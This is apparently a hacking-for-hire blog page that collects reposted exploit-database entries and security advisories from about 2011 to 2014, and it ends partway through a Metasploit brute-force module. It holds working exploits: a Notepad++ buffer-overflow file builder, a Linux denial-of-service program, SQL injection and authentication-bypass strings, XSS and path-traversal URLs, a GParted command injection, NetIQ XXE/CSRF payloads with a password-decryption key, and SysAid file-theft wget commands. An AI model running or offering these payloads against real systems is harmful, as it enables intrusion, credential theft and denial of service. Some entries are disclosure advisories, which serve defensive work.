Jump to content

Hacker Technology

A group blog by Leader in Hacker Website - Providing Professional Ethical Hacking Services

  • Entries

    16114

  • Comments

    7952

  • Views

    863228279

Contributors to this blog

  • HireHackking 16114

About this blog

Hacking techniques include penetration testing, network security, reverse cracking, malware analysis, vulnerability exploitation, encryption cracking, social engineering, etc., used to identify and fix security flaws in systems.

HireHackking 
source: https://www.securityfocus.com/bid/47245/info

Microsoft Excel is prone to a buffer-overflow vulnerability.

Attackers can exploit this issue by enticing an unsuspecting user to open a specially crafted Excel file.

Successful exploits can allow attackers to execute arbitrary code with the privileges of the user running the application. Failed exploit attempts will result in a denial-of-service condition. 

https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/35573.zip
HireHackking 
#!/usr/bin/python
# Exploit Title: NotePad++ v6.6.9 Buffer Overflow
# URL Vendor: http://notepad-plus-plus.org/
# Vendor Name: NotePad
# Version: 6.6.9
# Date: 22/12/2014
# CVE:  CVE-2014-1004
# Author: TaurusOmar   
# Twitter: @TaurusOmar_
# Email:  taurusomar13@gmail.com
# Home:  overhat.blogspot.com
# Risk: Medium

#Description:
#Notepad++ is a free (as in "free speech" and also as in "free beer") source code editor and Notepad replacement that supports several languages. 
#Running in the MS Windows environment, its use is governed by GPL License.
#Based on the powerful editing component Scintilla, Notepad++ is written in C++ and uses pure Win32 API and STL which ensures a higher execution speed 
#and smaller program size. By optimizing as many routines as possible without losing user friendliness, Notepad++ is trying to reduce the world carbon 
#dioxide emissions. When using less CPU power, the PC can throttle down and reduce power consumption, resulting in a greener environment.

#Proof Concept
#http://i.imgur.com/TTDtxJM.jpg

#Code
import struct
def little_endian(address):
  return struct.pack("<L",address)
poc ="\x41" * 591
poc+="\xeb\x06\x90\x90"
poc+=little_endian(0x1004C31F)
poc+="\x90" * 80
poc+="\x90" * (20000 - len(poc))
header = "\x3c\x3f\x78\x6d\x6c\x20\x76\x65\x72\x73\x69\x6f\x6e\x3d\x22\x31\x2e\x30\x22\x20\x65\x6e\x63\x6f\x64\x69\x6e\x67\x3d\x22"
header += "\x55\x54\x46\x2d\x38\x22\x20\x3f\x3e\x0a\x3c\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a\x09\x3c\x45\x76\x65\x6e\x74\x20\x55"
header += "\x72\x6c\x3d\x22\x22\x20\x54\x69\x6d\x65\x3d\x22\x68\x74\x74\x70\x3a\x2f\x2f\x0a" + poc
footer = "\x22\x20\x46\x6f\x6c\x64\x65\x72\x3d\x22\x22\x20\x2f\x3e\x0a\x3c\x2f\x53\x63\x68\x65\x64\x75\x6c\x65\x3e\x0a"
exploit =  header + footer
filename = "notepad.xml"
file = open(filename , "w")
file.write(exploit)
file.close()
HireHackking 
source: https://www.securityfocus.com/bid/47309/info

eForum is prone to an arbitrary-file-upload vulnerability because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this issue to upload arbitrary code and run it in the context of the webserver process.

eForum 1.1 is vulnerable; other versions may also be affected. 

if (isset($_FILES)) { //upload attachments
  ...snip...
   $invalidFileTypes = array('php', 'php3', 'php4', 'php5', 'exe', 'dll', 'so', 'htaccess');
   $uploaddir = $eforum->path.'/upload';
   $upfiles = $_FILES['efattachment'];
     foreach ($upfiles['name'] as $idx => $upname) {
       if ($upname != '') {
         $source = $upfiles['tmp_name'][$idx];
           if (is_uploaded_file($source)) {
             if (in_array($fmanager->FileExt($upname), $invalidFileTypes)) { continue; }
HireHackking 
source: https://www.securityfocus.com/bid/47299/info

Live Wire for Wordpress is prone to multiple security vulnerabilities. These vulnerabilities include multiple denial-of-service vulnerabilities, a cross-site scripting vulnerability, and an information-disclosure vulnerability.

Exploiting these issues could allow an attacker to deny service to legitimate users, gain access to sensitive information, execute arbitrary script code, or steal cookie-based authentication credentials. Other attacks may also be possible.

Live Wire for Wordpress 2.3.1 is vulnerable; other versions may also be affected. 

http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=%3Cbody%20onload=alert(document.cookie)%3E.jpg

http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=jpg

http://www.example.com/wp-content/themes/livewire-edition/thumb.php?src=http://site/big_file&h=1&w=1
HireHackking 
source: https://www.securityfocus.com/bid/47298/info
 
Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.
 
A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.
 
Etki Video Pro 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/kategori.asp?cat=1 [SQL Injection]
HireHackking 
source: https://www.securityfocus.com/bid/47298/info

Etki Video Pro is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Etki Video Pro 2.0 is vulnerable; other versions may also be affected. 

http://www.example.com/[path]/izle.asp?id=254 [SQL Injection]
HireHackking 
/*
source: https://www.securityfocus.com/bid/47296/info

The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to cause an out-of-memory condition, denying service to legitimate users. 
*/

#include <sys/inotify.h>
#include <unistd.h>

int main(int argc, char *argv[])
{
        int fds[2];

        /* Circumvent max inotify instances limit */
        while (pipe(fds) != -1)
                ;

        while (1)
                inotify_init();

        return 0;
}
HireHackking 
source: https://www.securityfocus.com/bid/47291/info

Dimac CMS XS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

Dimac CMS XS 1.3 is vulnerable; other versions may also be affected. 

The following example URI and data are available:

http://www.example.com/[path]/CMSadmin/default.asp

Username : admin
Password : 1'or'1'='1
HireHackking 
source: https://www.securityfocus.com/bid/47282/info

1024cms is prone to multiple cross-site scripting vulnerabilities, multiple local file-include vulnerabilities, and a directory-traversal vulnerability

An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site, steal cookie-based authentication credentials, and open or run arbitrary files in the context of the webserver process ad gain access to sensitive information.

1024cms 1.1.0 beta is vulnerable; other versions may also be affected. 

http://www.example.com/index.php?mode=login&processfile=../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/modules/forcedownload/force_download.php?filename=../../../../../../../etc/passwd
http://www.example.com/index.php?act=../../../../../../etc/passwd%00
http://www.example.com/dashboard.php?act=../../../../../../../etc/passwd%00
http://www.example.com/index.php?msg=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_error=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_okay=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_info=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
http://www.example.com/dashboard.php?msg_attention=PHNjcmlwdD5hbGVydCgnWFNTJyk7PC9zY3JpcHQ%2b
HireHackking 
source: https://www.securityfocus.com/bid/47277/info

Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input.

Exploiting these issues will allow an attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site and to view arbitrary local files and directories within the context of the webserver. This may let the attacker steal cookie-based authentication credentials and other harvested information, which may aid in launching further attacks.

Fiberhome HG-110 firmware 1.0.0 is vulnerable other versions may also be affected. 

The following example URIs are available:

http://www.example.com/cgi-bin/webproc?getpage=%3Cscript%3Ealert%28this%29%3C/script%3E&var:menu=advanced&var:page=dns

Local File Include and Directory/Path Traversal:

-
http://www.example.com/cgi-bin/webproc?getpage=../../../../../../../../../../../../etc/passwd&var:menu=advanced&var:page=dns
HireHackking 
source: https://www.securityfocus.com/bid/47273/info

eGroupware is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

eGroupware 1.8.001 is vulnerable; other versions may also be affected. 

http://www.example.com/egroupware/phpgwapi/js/jscalendar/test.php?lang=%22%3E%3C/script%3E%3Cscript%3Ealert%280%29%3C/script%3E
HireHackking 
SEC Consult Vulnerability Lab Security Advisory < 20141218-1 >
=======================================================================
             title: OS Command Execution
           product: GParted - Gnome Partition Editor
vulnerable version: <=0.14.1
     fixed version: >=0.15.0,
                    <=0.14.1 with fix for CVE-2014-7208 applied
        CVE number: CVE-2014-7208
            impact: medium
          homepage: http://gparted.org/
             found: 2014-07
                by: W. Ettlinger
                    SEC Consult Vulnerability Lab
                    https://www.sec-consult.com
=======================================================================

Vendor description:
-------------------
"GParted is a free partition editor for graphically managing your disk
partitions.

With GParted you can resize, copy, and move partitions without data
loss, enabling you to:
* Grow or shrink your C: drive
* Create space for new operating systems
* Attempt data rescue from lost partitions"

URL: http://gparted.org/index.php


Vulnerability overview/description:
-----------------------------------
Gparted <=0.14.1 does not properly sanitize strings before passing
them as parameters to an OS command. Those commands are executed
using root privileges.

Parameters that are being used for OS commands in Gparted are normally
determined by the user (e.g. disk labels, mount points).  However, under
certain circumstances, an attacker can use an external storage device to
inject command parameters. These circumstances are met if for example an
automounter uses a filesystem label as part of the mount path.

Please note that GParted versions before 0.15 are still being used
in distributions. E.g Debian Wheezy is vulnerable to this issue before
applying the patches.


Proof of concept:
-----------------
The following command creates a malicious filesystem.

# mkfs.ext2 -L "\`reboot\`" /dev/sdXX

When this filesystem is mounted by an automounter to a mountpoint
containing the filesystem label and the user tries to unmount this filesystem
using GParted, the system reboots.

Vulnerable / tested versions:
-----------------------------
Gparted versions <=0.14.1 were found to be vulnerable.


Vendor contact timeline:
------------------------
2014-10-29: Contacting maintainer (Curtis Gedak) through
           gedakc AT users DOT sf DOT net
2014-10-29: Initial response from maintainer offering encryption
2014-10-30: Sending encrypted advisory
2014-10-30: Maintainer confirms the behaviour, will be investigated
           further
2014-11-04: Maintainer sends initial patches
2014-11-05: Giving a few notes on the patches
2014-11-05: Maintainer clarifies a few concerns with the patches;
           Forwards patches to Mike Fleetwood for review
2014-11-08: Review shows that the patches cause functional
           problems; proposes further procedure
2014-11-08: Maintainer proposes a different patching approach
2014-11-08: Reviewer shows concerns with this approach, opens
           a security bug (1171909) with Fedora (in accordance with
           their Security Tracking Bugs procedure);
           Red Hat creates tracking bug 1172549
2014-11-15: New patches for several versions
2014-11-23: Maintainer sends vulnerability information to Debian
2014-11-29: Debian Security Team responds, asks for embargo date and
           CVE number
2014-11-30: Release date set to 2014-12-18
2014-12-11: Mailing list linux-distros AT vs DOT openwall DOT org informed
2014-12-11: Writing that embargo may be lifted, SEC Consult will release
           advisory on 2014-12-18
2014-12-18: Coordinated release of security advisory


Solution:
---------
Update GParted to version >= 0.15.0 or apply security patches for
CVE-2014-7208.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF W. Ettlinger / @2014
HireHackking 
SEC Consult Vulnerability Lab Security Advisory < 20141218-2 >
=======================================================================
             title: Multiple high risk vulnerabilities
           product: NetIQ Access Manager
vulnerable version: 4.0 SP1
     fixed version: 4.0 SP1 Hot Fix 3
        CVE number: CVE-2014-5214, CVE-2014-5215, CVE-2014-5216,
                    CVE-2014-5217
            impact: High
          homepage: https://www.netiq.com/
             found: 2014-10-29
                by: W. Ettlinger
                    SEC Consult Vulnerability Lab
                    https://www.sec-consult.com
=======================================================================

Vendor/product description:
---------------------------
"As demands for secure web access expand and delivery becomes increasingly
complex, organizations face some formidable challenges. Access Manager
provides a simple yet secure and scalable solution that can handle all your
web access needs—both internal as well as in the cloud."

URL: https://www.netiq.com/products/access-manager/


Business recommendation:
------------------------
An attacker without an account on the NetIQ Access Manager is be able to gain
administrative access by combining different attack vectors. Though this host
may not always be accessible from a public network, an attacker is still able
to compromise the system when directly targeting administrative users.

Because the NetIQ Access Manager is used for authentication, an attacker
compromising the system can use it to gain access to other systems.

SEC Consult highly recommends that this software is not used until a full
security review has been performed and all issues have been resolved.


Vulnerability overview/description:
-----------------------------------
1) XML eXternal Entity Injection (XXE, CVE-2014-5214)
Authenticated administrative users can download arbitrary files from the Access
Manager administration interface as the user "novlwww".

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015993


2) Reflected Cross Site Scripting (XSS, CVE-2014-5216)
Multiple reflected cross site scripting vulnerabilities were found. These
allow effective attacks of administrative and SSLVPN sessions.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015994


3) Persistent Site Scripting (XSS, CVE-2014-5216)
A persistent cross site scripting vulnerability was found. This allows
effective attacks of administrative and SSLVPN sessions.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015996


4) Cross Site Request Forgery (CVE-2014-5217)
The Access Manager administration interface does not have CSRF protection.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015997


5) Information Disclosure (CVE-2014-5215)
Authenticated users of the administration interface can gain authentication
information of internal administrative users.

The vendor provided the following KB link:
https://www.novell.com/support/kb/doc.php?id=7015995


By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!


Proof of concept:
-----------------
1) XML eXternal Entity Injection (XXE)
As an example, the following URL demonstrates the retrieval of the /etc/passwd
file as an authenticated administrative user:

https://<host>:8443/nps/servlet/webacc?taskId=fw.PreviewObjectFilter&nextState=initialState&merge=fw.TCPreviewFilter&query=<!DOCTYPE+request+[%0a<!ENTITY+include+SYSTEM+"/etc/passwd">%0a]><query><container>%26include%3b</container><subclasses>false</subclasses></query>


2) Reflected Cross Site Scripting (XSS)
The following URLs demonstrate different reflected XSS flaws in the
administration interface and the user interface.

https://<host>:8443/nps/servlet/webacc?taskId=dev.Empty&merge=dm.GenericTask&location=/roma/jsp/admin/view/main.jss'%2balert+('xss')%2b'

https://<host>:8443/roma/jsp/debug/debug.jsp?xss=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

https://<host>:8443//nps/servlet/webacc?taskId=debug.DumpAll&xss=%3Cimg%20src=%22/404%22%20onerror=%22alert+%28%27xss%27%29%22%3E

https://<host>/nidp/jsp/x509err.jsp?error=%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E

https://<host>/sslvpn/applet_agent.jsp?lang=%22%3E%3Cscript%3Ealert%28%27xss%27%29%3C/script%3E


3) Persistent Site Scripting (XSS)
The following URL injects a stored script on the auditing page:

https://<host>:8443/roma/system/cntl?handler=dispatcher&command=auditsave&&secureLoggingServersA='){}};alert('xss');function+x(){if('&port=1289


4) Cross Site Request Forgery
As an example, an attacker is able to change the administration password to
'12345' by issuing a GET request in the context of an authenticated
administrator. The old password is not necessary for this attack!

https://<host>:8443/nps/servlet/webacc?taskId=fw.SetPassword&nextState=doSetPassword&merge=dev.GenConf&selectedObject=P%3Aadmin.novellP&single=admin.novell&SetPswdNewPassword=12345&SetPswdVerifyPassword=12345


5) Information Disclosure
The following URLs disclose several useful information to an authenticated
account:

https://<host>:8443/roma/jsp/volsc/monitoring/dev_services.jsp
https://<host>:8443/roma/jsp/debug/debug.jsp

The disclosed system properties:
com.volera.vcdn.monitor.password
com.volera.vcdn.alert.password
com.volera.vcdn.sync.password
com.volera.vcdn.scheduler.password
com.volera.vcdn.publisher.password
com.volera.vcdn.application.sc.scheduler.password
com.volera.vcdn.health.password

The static string "k~jd)*L2;93=Gjs" is XORed with these values in order
to decrypt passwords of internally used service accounts.



By combining all of the above vulnerabilities (CSRF, XSS, XXE) an
unauthenticated, non-admin user may gain full access to the system!


Vulnerable / tested versions:
-----------------------------
The vulnerabilities have been verified to exist in the NetIQ Access Manager
version 4.0 SP1, which was the most recent version at the time of discovery.


Vendor contact timeline:
------------------------
2014-10-29: Contacting security@netiq.com, sending responsible disclosure
           policy and PGP keys
2014-10-29: Vendor redirects to security@novell.com, providing PGP keys
           through Novell support page
2014-10-30: Sending encrypted security advisory to Novell
2014-10-30: Novell acknowledges the receipt of the advisory
2014-12-16: Novell: the vulnerability fixes will be released tomorrow;
           The CSRF vulnerability will not be fixed immediately
           ("Since this can be done only after an authorized login");
           two XSS vulnerabilities can not be exploited ("We could not
           take advantage or retrieve any cookie info on the server
           side - it looks like it's a client side cross scripting
           attack.")
2014-12-16: Explaining why those vulnerabilities can be exploited
2014-12-17: Novell: Fix will be released tomorrow
2014-12-17: Verifying release of advisory tomorrow
2014-12-18: Novell: Advisory can be released
2014-12-18: Coordinated release of security advisory


Solution:
---------
Update to the latest available of Access Manager and implement workarounds
mentioned in the KB articles by Novell linked above.


Workaround:
-----------
For some vulnerabilities, Novell provides best practice recommendations in the
URLs linked above.


Advisory URL:
-------------
https://www.sec-consult.com/en/Vulnerability-Lab/Advisories.htm


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
SEC Consult Vulnerability Lab

SEC Consult
Vienna - Bangkok - Frankfurt/Main - Montreal - Singapore - Vilnius - Zurich

Headquarter:
Mooslackengasse 17, 1190 Vienna, Austria
Phone:   +43 1 8903043 0
Fax:     +43 1 8903043 15

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

Interested to work with the experts of SEC Consult?
Write to career@sec-consult.com

EOF W. Ettlinger / @2014
HireHackking 
Vantage Point Security Advisory 2014-004
========================================

Title: SysAid Server Arbitrary File Disclosure
ID: VP-2014-004
Vendor: SysAid
Affected Product: SysAid On-Premise
Affected Versions: < 14.4.2
Product Website: http://www.sysaid.com/product/sysaid
Author: Bernhard Mueller <bernhard[at]vantagepoint[dot]sg>


Summary:
---
SysAid Server is vulnerable to an unauthenticated file disclosure
attack that allows an anonymous attacker to read arbitrary files on
the system. An attacker exploiting this issue can compromise SysAid
user accounts and gain access to important system files. When SysAid
is configured to use LDAP authentication it is possible to gain read
access to the entire Active Directory or obtain domain admin
privileges.

Details:
---

How to download SysAid server database files containing usernames and
password hashes (use any unauthenticated session ID):

wget -O "ilient.mdf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient.mdf"

wget -O "ilient.ldf" --header="Cookie:
JSESSIONID=1C712103AA8E9A3D3F1D834E0063A089" \
"http://sysaid.example.com/getRdsLogFile?fileName=c:\\\\Program+Files\\\\SysAidMsSQL\\\\MSSQL10_50.SYSAIDMSSQL\\\\MSSQL\\DATA\\\\ilient_log.LDF"


The dowloaded MSSQL files contain the LDAP user account and encrypted
password used to access the Active Directory (SysAid encrypts the
password with a static key that is the same for all instances of the
software).


Fix Information:
---

Upgrade to version 14.4.2.


Timeline:
---

2014/11/14: Issue reported
2014/12/22: Patch available and installed by client

About Vantage Point Security:
---

Vantage Point Security is the leading provider for penetration testing
and security advisory services in Singapore. Clients in the Financial,
Banking and Telecommunications industries  select Vantage Point
Security based on technical competency and a proven track record to
deliver significant and measurable improvements in their security
posture.

Web: https://www.vantagepoint.sg/
Contact: office[at]vantagepoint[dot]sg
HireHackking 
# Exploit Title     	: jetAudio 8.1.3 Basic (Corrupted mp3) Crash POC
# Product				: jetAudio Basic
# Date              	: 8.12.2014
# Exploit Author    	: ITDefensor Vulnerability Research Team http://itdefensor.ru/
# Software Link     	: http://www.jetaudio.com/download/
# Vulnerable version	: 8.1.3 (Latest at the moment) and probably previous versions
# Vendor Homepage   	: http://www.jetaudio.com/
# Tested on         	: jetAudio 8.1.3 Basic installed on Windows 7 x64, Windows Server 2008, Windows 7 x86
# CVE 					: unknown at the moment
#============================================================================================
# Open created POC file (fault.mp3) with jetAudio
# Details
# 	(1e764.1df98): Access violation - code c0000005 (first chance)
#	First chance exceptions are reported before any exception handling.
#	This exception may be expected and handled.
#	jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9:
#	0aa6b8b9 8b4804          mov     ecx,dword ptr [eax+4] ds:002b:00000004=????????
#	0:000:x86> kb
#	ChildEBP RetAddr  Args to Child              
#	WARNING: Stack unwind information not available. Following frames may be wrong.
#	00000000 00000000 00000000 00000000 00000000 jdl_id3lib!dami::io::BStringWriter::writeChars+0xbf9
#============================================================================================
#!/usr/bin/python
  
pocdata=("\x49\x44\x33\x00\x00\xC9\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\x41\x45\x4E\x43\x00\x00\x00\x00\x00\x00\xFF\x8E\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x54\x41\x47\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00")
  
mp3file = "fault.mp3"
file = open(mp3file , "w")
file.write(pocdata)
file.close()
HireHackking 
##################################################################################################
#Exploit Title : phpMyRecipes 1.2.2 SQL injection(page browse.php, parameter category)
#Author        : Manish Kishan Tanwar
#Download Link : http://prdownloads.sourceforge.net/php-myrecipes/phpMyRecipes-1.2.2.tar.gz?download
#Date          : 23/12/2014
#Discovered at : IndiShell Lab
# Love to      : zero cool,Team indishell,Mannu,Viki,Hardeep Singh,jagriti
# email        : manish.1046@gmail.com
##################################################################################################

////////////////////////
/// Overview:
////////////////////////


phpMyRecipes is a simple application for storing and retrieving recipes. 
It uses a web-based interface, for ease of use across any system, and a MySQL database backend for storing the recipes.
///////////////////////////////
// Vulnerability Description:
///////////////////////////////
vulnerability is due to parameter category in browse.php 
parameter category is passing to function GetCategoryNameByID without data filtering and due to it, SQL injection vulnerability is arising.

from line 38 to 56

    $category = $_GET['category'];
  }

  $session = getsession();

  c_header("Browse Recipes", "browse");

  # Build a category string
  $cat = $category;
  $catstr = "";
  while ($cat != 1) {
    if ($catstr == "") {
      $catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) .  "</A>" . $catstr;
    } else {
      $catstr = "<A HREF=\"" . slink("browse.php?category=$cat") . "\">" . GetCategoryNameByID($cat) .  "</A> > " . $catstr;
    }

    $cat = GetCategoryParentByID($cat);
  }
  

////////////////
///  POC   ////
///////////////

POC image=http://oi57.tinypic.com/inv3ol.jpg
 payload for extracting database name 
 set value of category parameter to 1 and add error based SQL injection payload to url
 
http://127.0.0.1/pr/browse.php?category=1 and(select 1 FROM(select count(*),concat((select (select (SELECT distinct concat(0x7e,0x27,cast(schema_name as char),0x27,0x7e) FROM information_schema.schemata LIMIT 0,1)) FROM information_schema.tables LIMIT 0,1),floor(rand(0)*2))x FROM information_schema.tables GROUP BY x)a)


                             --==[[ Greetz To ]]==--
############################################################################################
#Guru ji zero ,code breaker ica, root_devil, google_warrior,INX_r0ot,Darkwolf indishell,Baba,
#Silent poison India,Magnum sniper,ethicalnoob Indishell,Reborn India,L0rd Crus4d3r,cool toad,
#Hackuin,Alicks,mike waals,Suriya Prakash, cyber gladiator,Cyber Ace,Golden boy INDIA,
#Ketan Singh,AR AR,saad abbasi,Minhal Mehdi ,Raj bhai ji ,Hacking queen,lovetherisk,Bikash Das
#############################################################################################
                             --==[[Love to]]==--
# My Father ,my Ex Teacher,cold fire hacker,Mannu, ViKi ,Ashu bhai ji,Soldier Of God, Bhuppi,
#Mohit,Ffe,Ashish,Shardhanand,Budhaoo,Don(Deepika kaushik)
                       --==[[ Special Fuck goes to ]]==--
                            <3  suriya Cyber Tyson <3
HireHackking 

BitRaider Streaming Client 1.3.3.4098 Local Privilege Escalation Vulnerability


Vendor: BitRaider, LLC
Product web page: http://www.bitraider.com
Affected version: 1.3.3.4098

Summary: BitRaider is a video game streaming and download service.

Desc: BitRaider contains a flaw that leads to unauthorized privileges being gained.
The issue is due to the program granting improper permissions with the 'F' flag for
the 'Users' group, which makes the entire 'BitRaider' directory and its sub directories
and files world-writable. This may allow a local attacker to change an executable file
with a binary file and gain elevated privileges.

List of executables affected:

o====================================================================================================o
|                      Binary/location                          |            Description             |
|                                                               |                                    |
|=============================================================== ====================================|
| C:\ProgramData\BitRaider\BRSptStub.exe                        |  BitRaider Support Stub            |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\common\BRException.exe               |  BitRaider Exception Handler       |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\common\brwc.exe                      |  BitRaider Distribution Web Client |
|---------------------------------------------------------------|------------------------------------|
| C:\ProgramData\BitRaider\support\1.3.3\E02B25FC\BRSptSvc.exe  |  BitRaider Support Service Core    |
o====================================================================================================o


Tested on: Microsoft Windows 7 Professional SP1 (EN)


Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
                            @zeroscience


Advisory ID: ZSL-2014-5217
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2014-5217.php


17.12.2014

----


C:\Users\user>sc qc BRSptStub
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: BRSptStub
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 3   DEMAND_START
        ERROR_CONTROL      : 0   IGNORE
        BINARY_PATH_NAME   : "C:\ProgramData\BitRaider\BRSptStub.exe"
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : BitRaider Mini-Support Service Stub Loader
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

C:\Users\user>icacls "C:\ProgramData\BitRaider\BRSptStub.exe"
C:\ProgramData\BitRaider\BRSptStub.exe BUILTIN\Users:(F)   <--------------------------
                                       NT AUTHORITY\SYSTEM:(F)
                                       NT AUTHORITY\Authenticated Users:(F)   <-------
                                       BUILTIN\Administrators:(F)
                                       NT AUTHORITY\INTERACTIVE:(F)   <---------------
                                       NT AUTHORITY\SERVICE:(F)
                                       BUILTIN\Guests:(RX)
                                       BUILTIN\Users:(I)(F)   <-----------------------
                                       NT AUTHORITY\SYSTEM:(I)(F)
                                       NT AUTHORITY\Authenticated Users:(I)(F)   <----
                                       BUILTIN\Administrators:(I)(F)
                                       NT AUTHORITY\INTERACTIVE:(I)(F)   <------------
                                       NT AUTHORITY\SERVICE:(I)(F)
                                       BUILTIN\Guests:(I)(RX)

Successfully processed 1 files; Failed processing 0 files

C:\Users\user>
HireHackking 
source: https://www.securityfocus.com/bid/47267/info

vtiger CRM is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

vtiger CRM 5.2.1 is vulnerable; other versions may also be affected. 

http://www.example.com/vtigercrm/vtigerservice.php?service=%3Cscript%3Ealert%280%29%3C/script%3E
HireHackking 
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Auxiliary

  include Msf::Exploit::Remote::Tcp
  include Msf::Auxiliary::Report
  include Msf::Auxiliary::AuthBrute
  include Msf::Auxiliary::Scanner

  def initialize
    super(
      'Name'           => 'Varnish Cache CLI Interface Bruteforce Utility',
      'Description'    => 'This module attempts to login to the Varnish Cache (varnishd) CLI instance using a bruteforce
